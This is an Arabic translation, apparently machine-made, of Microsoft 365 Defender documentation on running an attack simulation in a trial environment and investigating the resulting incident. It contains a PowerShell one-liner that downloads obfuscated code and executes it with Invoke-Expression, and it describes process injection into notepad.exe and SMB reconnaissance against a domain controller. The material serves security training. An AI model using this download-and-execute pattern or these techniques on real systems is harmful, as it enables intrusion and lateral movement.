تشغيل محاكاة هجوم في بيئة تجريبية Microsoft 365 Defender التشغيل

هذه المقالة هي الخطوة 1 من 2 في عملية إجراء تحقيق والاستجابة لحادث في Microsoft 365 Defender بيئة تجريبية. لمزيد من المعلومات حول هذه العملية، راجع مقالة النظرة العامة.

بعد إعداد بيئة التجربة، حان الوقت لاختبار استجابة Microsoft 365 Defender لحادث وإمكانيات المعالجة والتقصي التلقائي من خلال إنشاء حادث بهجمة محاكاة واستخدام مدخل Microsoft 365 Defender للتحقق والرد.

إن حادث Microsoft 365 Defender هو مجموعة من التنبيهات المرتبطة والبيانات المقترنة بها التي تكو رواية هجوم.

Microsoft 365 الخدمات والتطبيقات تنبيهات عندما تكتشف حدثا أو نشاطا مريبا أو ضارا. توفر التنبيهات الفردية دلائل قيمة حول هجوم مكتمل أو جار. ومع ذلك، تستخدم الهجمات عادة أساليب مختلفة ضد أنواع مختلفة من الكيانات، مثل الأجهزة والمستخدمين علب البريد. النتيجة هي تنبيهات متعددة لكيانات متعددة في المستأجر.

ملاحظة

إذا كنت حديث العهد بتحليل الأمان والاستجابة للحوادث، فراجع معاينة الاستجابة للحوادث الأولى للحصول على جولة إرشادية لعملية نموذجية للتحليل والرد ومراجعة ما بعد الحادث.

محاكاة الهجمات باستخدام مدخل Microsoft 365 Defender

لقد Microsoft 365 Defender المدخل قدرات مضمنة لإنشاء هجمات محاكاة على بيئة التجربة:

Defender لـ Office 365 التدريب على محاكاة الهجمات

Defender لـ Office 365 مع Microsoft 365 E5 أو Microsoft Defender لـ Office 365 الخطة 2 التدريب على محاكاة الهجمات لهجمات التصيد الاحتيالي. الخطوات الأساسية هي:

  1. إنشاء محاكاة

    للحصول على إرشادات مفصلة خطوة بخطوة حول كيفية إنشاء محاكاة جديدة وإطلاقها، راجع محاكاة هجوم تصيد احتيالي.

  2. إنشاء تحميل

    للحصول على إرشادات مفصلة خطوة بخطوة حول كيفية إنشاء تحميل للاستخدام في عملية محاكاة، راجع إنشاء تحميل مخصص للتدريب على محاكاة الهجمات.

  3. الحصول على تحليلات

    للحصول على إرشادات مفصلة خطوة بخطوة حول كيفية الحصول على تحليلات مع إعداد التقارير، راجع الحصول على تحليلات من خلال التدريب على محاكاة الهجمات.

لمزيد من المعلومات، راجع عمليات المحاكاة.

Defender for Endpoint attack tutorials & محاكاة

فيما يلي عمليات محاكاة Defender for Endpoint من Microsoft:

  • المستند ينسدل إلى الخلف
  • التحقيق التلقائي (backdoor)

هناك عمليات محاكاة إضافية من مصادر جهة خارجية. هناك أيضا مجموعة من البرامج التعليمية.

لكل محاكاة أو برنامج تعليمي:

  1. قم بتنزيل المستند الذي تم توفيره وقراءته.

  2. قم بتنزيل ملف المحاكاة. يمكنك اختيار تنزيل الملف أو البرنامج النصي على جهاز الاختبار ولكنه ليس إلزاميا.

  3. تشغيل ملف المحاكاة أو البرنامج النصي على جهاز الاختبار كما هو مرشاد في المستند التدريبي.

لمزيد من المعلومات، راجع تجربة Microsoft Defender لنقطة النهاية هجوم محاكاة.

محاكاة هجوم باستخدام وحدة تحكم مجال معزولة والجهاز العميل (اختياري)

في هذا التمرين الاختياري للاستجابة للحوادث، ستمحاكاة هجوم على وحدة تحكم معزولة في مجال خدمات مجال Active Directory (AD DS) وعلى جهاز Windows باستخدام برنامج PowerShell النصي، ثم تحقق من الحادث وتحله وتحله.

أولا، تحتاج إلى إضافة نقاط نهاية إلى بيئة التجربة.

إضافة نقاط نهاية بيئة تجريبية

أولا، تحتاج إلى إضافة وحدة تحكم معزولة لمجال AD DS Windows إلى بيئة التجربة.

  1. تحقق من تمكين المستأجر التجريبي لبيئة Microsoft 365 Defender.

  2. تحقق من وحدة التحكم بالمجال:

  3. تحقق من أن جهاز الاختبار الخاص بك:

إذا كنت تستخدم مجموعات المستأجرين والجهاز، فنشئ مجموعة أجهزة مخصصة لجهاز الاختبار وادفعها إلى المستوى الأعلى.

هناك بديل وهو استضافة وحدة التحكم في مجال AD DS واختبار الجهاز كآلات ظاهرية في خدمات البنية الأساسية ل Microsoft Azure. يمكنك استخدام الإرشادات في المرحلة 1 من دليل اختبار اختبار المؤسسة الذي تم محاكاته، ولكن تخطي إنشاء الجهاز الظاهري APP1.

إليك النتيجة.

بيئة التقييم باستخدام دليل مختبر الاختبار الخاص بالمؤسسة الذي تم محاكاته

ستمحاكاة هجوم متطورة تستفيد من التقنيات المتقدمة لإخفاء البيانات من الكشف. يقوم هجوم تعداد جلسات كتلة رسائل الخادم المفتوحة (SMB) على وحدات التحكم بالمجال واسترداد عناوين IP الأخيرة للأجهزة الخاصة بالمستخدمين. لا تتضمن هذه الفئة من الهجمات عادة الملفات التي يتم إسقاطها على جهاز الضحيه، وهي تحدث في الذاكرة فقط. فهي "تعيش خارج الأرض" باستخدام الأدوات الإدارية والأدوات النظامية الموجودة وتدخل التعليمات البرمجية الخاصة بها في عمليات النظام لإخفاء تنفيذها. يسمح مثل هذا السلوك لهم بالتجنب من الكشف والمثابرة على الجهاز.

في عملية المحاكاة هذه، يبدأ السيناريو النموذجي لدينا مع برنامج PowerShell النصي. في الواقع، قد يتم خداع المستخدم لتشغيل برنامج نصي أو قد يتم تشغيل البرنامج النصي من اتصال عن بعد بكمبيوتر آخر من جهاز موبوء مسبقا، مما يشير إلى أن المهاجم يحاول التنقل بشكل لاحق في الشبكة. قد يكون الكشف عن هذه البرامج النصية صعبا لأن المسؤولين غالبا ما يقوموا بتشغيل البرامج النصية عن بعد لتنفيذ أنشطة إدارية متنوعة.

هجوم PowerShell بدون ملف مع عملية بحقن وهجمة إعادة التشابه ل SMB

أثناء عملية المحاكاة، يدخل الهجوم رمز shellcode في عملية تبدو غير مهيئة. يتطلب السيناريو استخدام notepad.exe. لقد اخترنا هذه العملية للمحاكاة، ولكن من المرجح أن يستهدف المهاجمون عملية نظام طويلة الأمد، مثل svchost.exe. بعد ذلك، سيتابع رمز shellcode الاتصال بخادم الأمر والتحكم (C2) الخاص بالمهاجم لتلقي إرشادات حول كيفية المتابعة. يحاول البرنامج النصي تنفيذ استعلامات الاستطلاع مقابل وحدة التحكم بالمجال (DC). تسمح الاستطلاعات للمهاجم ب الحصول على معلومات حول أحدث معلومات تسجيل دخول المستخدم. بمجرد أن يحصل المهاجمون على هذه المعلومات، يمكنهم الانتقال بشكل لاحق في الشبكة للوصول إلى حساب حساس معين

هام

للحصول على أفضل النتائج، اتبع إرشادات محاكاة الهجمات قدر الإمكان.

تشغيل محاكاة هجوم وحدة التحكم في مجال AD DS المعزولة

لتشغيل محاكاة سيناريو الهجوم:

  1. تأكد من أن بيئة التجربة تتضمن وحدة التحكم في مجال AD DS Windows معزولة.

  2. سجل الدخول إلى جهاز الاختبار باستخدام حساب المستخدم الاختباري.

  3. افتح نافذة Windows PowerShell على جهاز الاختبار.

  4. انسخ برنامج محاكاة البرنامج النصي التالي:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
    = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
    -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
    $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
    $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
    

    ملاحظة

    إذا فتحت هذه المقالة على مستعرض ويب، فقد تواجه مشاكل في نسخ النص الكامل دون فقدان أحرف معينة أو إدخال فواصل سطر إضافية. إذا كان الأمر كذلك، ف قم بتنزيل هذا المستند وافتحه على Adobe Reader.

  5. لصق البرنامج النصي المنسوخ وتشغيله في نافذة PowerShell.

ملاحظة

إذا كنت تقوم بتشغيل PowerShell باستخدام بروتوكول سطح المكتب البعيد (RDP)، فاستخدم الأمر نوع نص الحافظة في عميل RDP لأن مفتاح CTRL-V hotkey أو أسلوب النقر بيمين قد لا يعمل. في بعض الأحيان لن تقبل الإصدارات الأخيرة من PowerShell هذا الأسلوب، وقد تحتاج إلى النسخ إلى المفكرة في الذاكرة أولا، ونسخها في الجهاز الظاهري، ثم لصقها في PowerShell.

بعد بضع ثوان، سيتم المفكرة التطبيق. سيتم إدخال رمز هجوم محاكاة في المفكرة. احتفظ بالمثيل الذي المفكرة تلقائيا مفتوحا لتجربة السيناريو الكامل.

سيحاول رمز الهجوم الذي تم محاكاته الاتصال إلى عنوان IP خارجي (محاكاة خادم C2)، ثم محاولة الاستطلاع على وحدة التحكم بالمجال من خلال SMB.

سترى هذه الرسالة معروضة على وحدة تحكم PowerShell عند اكتمال هذا البرنامج النصي:

ran NetSessionEnum against [DC Name] with return code result 0

لرؤية الميزة "حادث والاستجابة التلقائية" في العمل، احتفظ notepad.exe العملية مفتوحة. سترى إيقاف الاستجابة والحادث التلقائي المفكرة العملية.

التحقق من الحادث في الهجوم الذي تم محاكاته

ملاحظة

قبل أن نستعرض عملية المحاكاة هذه، شاهد الفيديو التالي لمعرفة كيف تساعدك إدارة الحوادث على جمع التنبيهات ذات الصلة معا كجزء من عملية التحقيق، حيث يمكنك العثور عليها في المدخل، وكيف يمكنها مساعدتك في عمليات الأمان:

عند التبديل إلى طريقة عرض محلل SOC، يمكنك الآن بدء التحقق من الهجوم في مدخل Microsoft 365 Defender.

  1. افتح Microsoft 365 Defender المدخل.

  2. من جزء التنقل، حدد & التنبيهات > الأحداث.

  3. سيظهر الحادث الجديد للهجوم الذي تم محاكاته في قائمة انتظار الأحداث.

    مثال على قائمة انتظار "الأحداث"

التحقق من الهجوم كحادثة واحدة

Microsoft 365 Defender ربط التحليلات بتجميع كل التنبيهات ذات الصلة والتحريات من منتجات مختلفة في كيان حادث واحد. من خلال القيام بذلك، Microsoft 365 Defender تعرض قصة هجوم أوسع، مما يسمح لمحلل SOC بفهم التهديدات المعقدة والاستجابة لها.

ترتبط التنبيهات التي يتم إنشاؤها أثناء عملية المحاكاة هذه بالخطر نفسه، ونتيجة لذلك، يتم تجميعها تلقائيا كحادث واحد.

لعرض الحادث:

  1. افتح Microsoft 365 Defender المدخل.

  2. من جزء التنقل، حدد & التنبيهات > الأحداث.

  3. حدد العنصر الجديد بالنقر فوق الدائرة الموجودة على الجانب الأيسر من اسم الحادث. تعرض اللوحة الجانبية معلومات إضافية حول الحادث، بما في ذلك كل التنبيهات ذات الصلة. لكل حادث اسم فريد يصفه استنادا إلى سمات التنبيهات التي يتضمنها.

    يمكن تصفية التنبيهات التي تظهر في لوحة المعلومات استنادا إلى موارد الخدمة: Microsoft Defender for Identity، Microsoft Defender for Cloud Apps، Microsoft Defender لنقطة النهاية، Microsoft 365 Defender، Microsoft Defender لـ Office 365.

  4. حدد فتح صفحة الحادث للحصول على مزيد من المعلومات حول الحادث.

    في صفحة الحادث ، يمكنك رؤية كل التنبيهات والمعلومات المتعلقة بالحادث. تتضمن المعلومات الكيانات والأصول المتدخلة في التنبيه ومصدر الكشف للتنبيهات (مثل Microsoft Defender for Identity أو Microsoft Defender لنقطة النهاية) والسبب الذي يدعو إلى ربطها معا. تظهر مراجعة قائمة تنبيهات الأحداث تقدم الهجوم. من طريقة العرض هذه، يمكنك رؤية التنبيهات الفردية والتحقق منها.

    يمكنك أيضا النقر فوق إدارة الحادث من القائمة اليسرى، وضع علامة على الحادث، وتعيينه لنفسك، وإضافة تعليقات.

مراجعة التنبيهات التي تم إنشاؤها

دعنا نطلع على بعض التنبيهات التي تم إنشاؤها أثناء هجوم محاكاة.

ملاحظة

سنتجول في بعض التنبيهات التي تم إنشاؤها أثناء الهجوم الذي تم محاكاته. استنادا إلى إصدار Windows والمنتجات Microsoft 365 Defender التي يتم تشغيلها على جهاز الاختبار، قد ترى المزيد من التنبيهات التي تظهر في ترتيب مختلف قليلا.

مثال على تنبيه تم إنشاؤه

تنبيه: تم ملاحظة عملية مريبة (المصدر: Microsoft Defender لنقطة النهاية)

يستخدم المهاجمون المتقدمون أساليب متطورة وخفية للمثابرة في الذاكرة والاخفاء من أدوات الكشف. إحدى التقنيات الشائعة هي العمل من داخل عملية نظام موثوق بها بدلا من أن تكون قابلة للتنفيذ ضارة، مما يجعل من الصعب على أدوات الكشف وعمليات الأمان اكتشاف التعليمات البرمجية الضارة.

للسماح لمحللين SOC بالقبض على هذه الهجمات المتقدمة، توفر أدوات استشعار الذاكرة العميقة في Microsoft Defender لنقطة النهاية خدمات السحابة لدينا مع رؤية غير مسبوقة لمجموعة متنوعة من أساليب استخدام التعليمات البرمجية عبر العمليات. يوضح الشكل التالي كيفية اكتشاف Defender لنقطة النهاية وتنبيهه حول محاولة إدخال التعليمات البرمجية notepad.exe.

مثال على التنبيه لحقن رمز يحتمل أن يكون ضارا

تنبيه: سلوك غير متوقع لاحظته عملية يتم تشغيلها بدون وسيطات سطر الأوامر (المصدر: Microsoft Defender لنقطة النهاية)

Microsoft Defender لنقطة النهاية الكشف عن الهجمة عادة السمة الأكثر شيوعا لتقنية الهجوم. يضمن هذا الأسلوب الديمومه ويرفع الشريط للمهاجمين للتبديل إلى أساليب أحدث.

نستخدم خوارزميات التعلم على نطاق واسع لإنشاء السلوك العادي للعمليات الشائعة داخل المؤسسة وعلى مستوى العالم ونراقب الحالات التي تظهر فيها هذه العمليات سلوكيات غير طبيعية. غالبا ما تشير هذه السلوكيات الشذوذية إلى أنه تم تقديم تعليمات برمجية دفينة ويتم تشغيلها في عملية أخرى موثوق بها.

بالنسبة لهذا السيناريو ، تظهرnotepad.exe سلوك غير طبيعي، بما في ذلك التواصل مع موقع خارجي. هذه النتيجة مستقلة عن الأسلوب المحدد المستخدم لإدخال التعليمات البرمجية الضارة وتنفيذها.

ملاحظة

نظرا لأن هذا التنبيه يستند إلى نماذج التعلم الآلي التي تتطلب معالجة إضافية للخلف، فقد يستغرق الأمر بعض الوقت قبل أن ترى هذا التنبيه في المدخل.

لاحظ أن تفاصيل التنبيه تتضمن عنوان IP الخارجي، وهو مؤشر يمكنك استخدامه كمؤشر محور لتوسيع التحقيق.

حدد عنوان IP في شجرة عملية التنبيه لعرض صفحة تفاصيل عنوان IP.

مثال على سلوك غير متوقع بواسطة عملية يتم تشغيلها بدون وسيطات سطر الأوامر

يعرض الشكل التالي صفحة تفاصيل عنوان IP المحددة (النقر فوق عنوان IP في شجرة عملية التنبيه).

مثال لصفحة تفاصيل عنوان IP

تنبيه: استطلاع عنوان IP والمستخدم (SMB) (المصدر: Microsoft Defender for Identity)

يمكن تعداد البيانات باستخدام بروتوكول كتلة رسائل الخادم (SMB) المهاجمين من الحصول على أحدث معلومات تسجيل دخول المستخدم التي تساعدهم على التنقل بشكل لاحق عبر الشبكة للوصول إلى حساب حساس معين.

في عملية الكشف هذه، يتم تشغيل تنبيه عند تشغيل تعداد جلسة عمل SMB مقابل وحدة تحكم المجال.

مثال على Microsoft Defender for Identity تنبيه المستخدم وعنوان IP

مراجعة المخطط الزمني للجهاز باستخدام Microsoft Defender لنقطة النهاية

بعد استكشاف التنبيهات المختلفة في هذا الحادث، انتقل مرة أخرى إلى صفحة الحادث التي قمت بالتحري فيها سابقا. حدد علامة التبويب الأجهزة في صفحة الحادث لمراجعة الأجهزة المتدخلة في هذا الحادث كما تم Microsoft Defender لنقطة النهاية Microsoft Defender for Identity.

حدد اسم الجهاز الذي وقع فيه الهجوم، لفتح صفحة الكيان لهذا الجهاز المحدد. في هذه الصفحة، يمكنك رؤية التنبيهات التي تم تشغيلها والأحداث ذات الصلة.

حدد علامة التبويب المخطط الزمني لفتح المخطط الزمني للجهاز وعرض كل الأحداث والسلوكيات التي تم ملاحظتها على الجهاز بترتيب زمني، تتقاطع مع التنبيهات التي تم رفعها.

مثال على المخطط الزمني للجهاز مع السلوكيات

يوفر توسيع بعض السلوكيات الأكثر إثارة للاهتمام تفاصيل مفيدة، مثل أشجار المعالجة.

على سبيل المثال، قم بالتمرير لأسفل حتى تجد حدث التنبيه الذي لاحظته عملية مريبة. حدد powershell.exe تم notepad.exe حدث معالجة أسفله، لعرض شجرة العملية الكاملة لهذا السلوك ضمن الرسم البياني لكيانات الحدث على الجزء الجانبي. استخدم شريط البحث للتصفية إذا لزم الأمر.

مثال على شجرة المعالجة للسلوك المحدد لإنشاء ملف PowerShell

مراجعة معلومات المستخدم باستخدام Microsoft Defender for Cloud Apps

في صفحة الحادث، حدد علامة التبويب المستخدمون لعرض قائمة المستخدمين المشاركين في الهجوم. يحتوي الجدول على معلومات إضافية حول كل مستخدم، بما في ذلك درجة أولوية التحقيق لكل مستخدم.

حدد اسم المستخدم لفتح صفحة ملف تعريف المستخدم حيث يمكن إجراء مزيد من التحقيق. اقرأ المزيد حول التحقق من المستخدمين الخطرين.

صفحة مستخدم Defender for Cloud Apps

المعالجة والتحري التلقائي

ملاحظة

قبل أن نطلعك على عملية المحاكاة هذه، شاهد الفيديو التالي لمعرفة ما هو الاختبار الذاتي التلقائي، وأين يمكن العثور عليه في المدخل، وكيف يمكنه مساعدتك في عمليات الأمان:

انتقل مرة أخرى إلى الحادث في Microsoft 365 Defender المدخل. تعرض علامة التبويب "عمليات التحقيق " في صفحة "الحادث" عمليات التحقيق التلقائية التي تم تشغيلها بواسطة Microsoft Defender for Identity Microsoft Defender لنقطة النهاية. تعرض لقطة الشاشة أدناه فقط التحقيق التلقائي الذي يتم تشغيله بواسطة Defender for Endpoint. بشكل افتراضي، يقوم Defender for Endpoint تلقائيا بتسهيل النتائج التي تم العثور عليها في قائمة الانتظار، مما يتطلب المعالجة.

مثال على عمليات التحقيق التلقائية ذات الصلة بالحادث

حدد التنبيه الذي تسبب في فتح التحقيق لفتح صفحة تفاصيل التحقيق. سترى التفاصيل التالية:

  • التنبيه (التنبيهات) التي كانت السبب في إجراء التحقيق التلقائي.
  • المستخدمون والأجهزة التي تم التأثير عليها. إذا تم العثور على مؤشرات على أجهزة إضافية، سيتم إدراج هذه الأجهزة الإضافية أيضا.
  • قائمة الأدلة. الوحدات التي تم العثور عليها وتحليلها، مثل الملفات والعمليات والخدمات وبرامج التشغيل وعناوين الشبكة. يتم تحليل هذه الكيانات للحصول على علاقات محتملة بالتنبيه ويتم تصنيفها على أنها ضارة أو ضارة.
  • تم العثور على التهديدات. التهديدات المعروفة التي يتم العثور عليها أثناء التحقيق.

ملاحظة

استنادا إلى التوقيت، قد يكون التحقيق التلقائي لا يزال قيد التشغيل. انتظر بضع دقائق حتى تكتمل العملية قبل تجميع الأدلة وتحليلها ومراجعة النتائج. تحديث صفحة تفاصيل التحقيق للحصول على النتائج الأخيرة.

مثال لصفحة تفاصيل التحقيق

أثناء عملية البحث التلقائية، Microsoft Defender لنقطة النهاية إلى notepad.exe العملية، التي تم إدخالها كواد من عمليات التحريك التي تتطلب المعالجة. يوقف Defender for Endpoint تلقائيا عملية المعالجة المريبة كجزء من المعالجة التلقائية.

يمكنك رؤيةnotepad.exeمن قائمة العمليات قيد التشغيل على جهاز الاختبار.

حل الحادث

بعد اكتمال التحقيق وتأكيد المعالجة، يمكنك حل الحادث.

من صفحة الحادث ، حدد إدارة الحادث. قم بتعيين الحالة إلى حل الحادث وحدد تنبيه True للتصنيف واختبار الأمان لتحديده.

مثال لصفحة الأحداث مع لوحة "إدارة الحادث" المفتوحة حيث يمكنك النقر فوق المفتاح لحل الحادث

عند حل هذا الحادث، فإنه يحل كل التنبيهات المقترنة في Microsoft 365 Defender المدخل والمداخل ذات الصلة.

يلتف هذا الأمر مع عمليات محاكاة الهجمات لتحليل الأحداث، والتحري التلقائي، وحل الحوادث.

الخطوة التالية

قدرات Microsoft 365 Defender الاستجابة للحوادث

الخطوة 2 من 2: تجربة Microsoft 365 Defender الاستجابة للحوادث

إنشاء Microsoft 365 Defender التقييم